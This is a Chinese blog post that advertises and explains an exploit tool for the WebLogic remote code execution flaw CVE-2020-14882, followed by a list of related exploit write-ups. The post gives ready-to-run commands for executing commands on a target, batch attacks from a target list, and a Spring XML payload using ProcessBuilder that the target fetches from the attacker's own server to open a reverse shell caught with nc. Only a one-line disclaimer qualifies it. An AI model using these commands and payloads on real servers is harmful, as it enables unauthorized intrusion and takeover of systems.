CVE-2020-14882_ALL综合利用工具

置顶 已于 2024-01-23 14:16:14 修改
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 其他文章 文章标签: CVE-2020-14882 weblogic 反序列化漏洞 命令回显 命令执行
于 2020-12-07 19:43:19 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/110825651
版权

简介

CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。

需要模块:requests、http.client

(工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。)

命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

工具地址:https://github.com/GGyao/CVE-2020-14882_ALL(喜欢的点个star喔)

选项

在这里插入图片描述

功能一:命令回显

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c “net user”
在这里插入图片描述

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c “whoami”
在这里插入图片描述

功能二:批量命令回显

python3 CVE-2020-14882_ALL.py -f target.txt -c “whoami”

target.txt 格式:http://x.x.x.x:xx,一行一个。
在这里插入图片描述

功能三:外置xml文件无回显命令执行

1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>cmd</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

开启python监听。
在这里插入图片描述

nc开启监听。
在这里插入图片描述

2、使用-x选项指定xml文件路径,发送payload。

python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
在这里插入图片描述

3、成功接收shell。
在这里插入图片描述

LQxdp
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
p32097173_12213201001_Generic.zip
12-02
修复CVE-2020-14750漏洞 2020年11月03日,360CERT监测发现 Oracle官方 发布了 Weblogic 验证绕过漏洞 的风险通告,该漏洞编号为 CVE-2020-14750 ,漏洞等级:严重,漏洞评分:9.8。 该漏洞由 360CERT 安全研究员提交,为 CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。 对此,360CERT建议广大用户及时将 Weblogic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
weblogic未授权命令执行漏洞(CVE-2020-14882)复现
weixin_45291045的博客
04-01 3298
文章目录漏洞概述漏洞影响范围环境搭建漏洞复现利用工具 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用漏洞在受影响的 WebLogic Server 上执行任意代码。 漏洞影响范围 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Webl
Spring漏洞综合利用工具v1.5
最新发布
Wulai399的博客
05-29 558
Spring漏洞综合利用工具v1.5
CVE-2020-14882&14883 Weblogic 管理控制台未授权远程命令执行漏洞复现
ierciyuan的博客
07-30 996
CVE-2020-14882&14883Weblogic管理控制台未授权远程命令执行漏洞复现。提供相关软件包(网盘)
weblogic——CVE_2020_14882
qq_17622203的博客
03-21 5206
影响版本 Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0 转自:weblogic 未授权命令执行漏洞CVE-2020-14882,CVE-2020-14883)复现 - My_Dreams - 博客园 vulfocus开
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建
m0_63558213的博客
09-01 1725
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
CVE-2020-14882_ALL-master.zip
02-07
【标题】"CVE-2020-14882_ALL-master.zip" 提供的信息表明,这是一个与安全漏洞相关的压缩文件,特别是针对CVE-2020-14882这一特定漏洞的测试工具或资料集合。CVE(Common Vulnerabilities and Exposures)是一种...
CVE-2020-0688_EXP:CVE-2020-0688_EXP自动触发有效载荷和加密方法
03-20
CVE-2020-0688_EXP CVE-2020-0688_EXP自动触发有效载荷 python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show ...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-06881_CVE-2020-06881_cve_exchange_powershell_
10-01
CVE-2020-0688 漏洞利用代码
Vulhub靶场之weblogic漏洞复现
weixin_66717977的博客
03-21 1446
vulhub靶场上weblogic漏洞复现
weblogic漏洞利用工具-WeblogicExploit-GUI
siu~
08-17 745
Weblogic漏洞利用图形化工具 支持注入内存马、一键上传webshell、命令执行
渗透测试系列:weblogic文件路径确认(cve-2020-14882
weixin_54626591的博客
01-12 1076
weblogic文件路径确认(cve-2020-14882
weblogic未授权访问漏洞复现(CVE-2020-14882
Armandhe的博客
06-07 4932
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6881
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现
二狗的博客
03-29 685
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
渗透测试:渗透流程思路(当拿到一个WindowsIP,演示weblogic漏洞cve-2020-14882
weixin_54626591的博客
01-12 121
渗透测试:渗透流程思路(当拿到一个WindowsIP)
Weblogic CVE-2020-14882 未授权远程命令执行漏洞
读书 买花 长大
02-25 607
CVE-2020-14882
CVE-2020-14882_ALL
07-29
回答: CVE-2020-14882_ALL是一个漏洞利用工具,用于利用Weblogic服务器上的漏洞。通过该漏洞,攻击者可以成功进入Weblogic服务器的后台,但由于权限过低,无法执行其他操作。\[1\]利用漏洞,可以测试执行命令并成功回显结果,例如使用"whoami"命令。\[1\]此外,还可以通过该漏洞执行反弹shell命令,成功反弹shell。\[2\]需要注意的是,这个漏洞利用工具也可以用于其他版本的Weblogic服务器,例如CVE-2019-2725。\[3\] #### 引用[.reference_title] - *1* *2* [Weblogic CVE-2020-14882 未授权远程命令执行漏洞](https://blog.csdn.net/m0_64297700/article/details/129213473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883](https://blog.csdn.net/weixin_51151498/article/details/128153645)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值